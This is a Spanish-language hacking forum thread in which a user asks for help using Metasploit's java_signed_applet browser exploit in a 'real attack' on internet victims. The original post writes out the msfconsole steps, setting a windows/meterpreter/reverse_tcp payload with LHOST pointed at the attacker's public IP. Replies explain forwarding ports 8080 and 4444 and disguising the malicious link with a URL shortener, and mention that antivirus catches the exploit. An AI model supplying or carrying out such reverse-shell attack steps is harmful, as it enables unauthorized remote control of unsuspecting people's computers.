metasploit DUDA ataque real !

Socket · 14 Septiembre 2013, 13:58 PM

buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada

ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor

[youtube=640,360]TbeAMnscYtg[/youtube]

pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA

exploit

Shell Root · 14 Septiembre 2013, 19:03 PM

Creo que bug java_applet es el exploit, payload es otra cosa.
tinyurl.com, es una pagina acortadora de links

xustyx · 14 Septiembre 2013, 19:29 PM

Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Socket · 14 Septiembre 2013, 23:34 PM

Cita de: xustyx en 14 Septiembre 2013, 19:29 PM
Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Espera por que dices que el firewall y el antivirus ? como en el video si sale bro explicame eso sabes de algun ataque real con reverse shell o payload algo parecido ?

xustyx · 15 Septiembre 2013, 02:46 AM

Acabo de probarla en red local y el avast salta con el exploit (se veia venir...). Al del video le debe salir porque el que infecta seguramente no tenga antivirus ni nada por el estilo.

beholdthe · 17 Septiembre 2013, 01:25 AM

Normal que salte el antivirus. Tendría narices que no saltara con ese exploit.

Socket · 17 Septiembre 2013, 15:36 PM

en serio salta el antivurus o no salta ?

beholdthe · 18 Septiembre 2013, 01:18 AM

Cita de: Socket en 17 Septiembre 2013, 15:36 PM
en serio salta el antivurus o no salta ?

En Metasploit eres bastante nuevo ¿verdad?
Deberías leer algo mas sobre como funciona y como es. En este foro hay mucha información sobre el tema. Estoy seguro que cuando leas algo mas, evitaras hacer este tipo de preguntas TAN OBVIAS.

MK-Ultra · 4 Octubre 2013, 15:31 PM

Ultimamente el foro esta lleno de lamers...

Tyrz · 4 Octubre 2013, 15:38 PM

y de gente que borde que parece responder con asco, hay formas y formas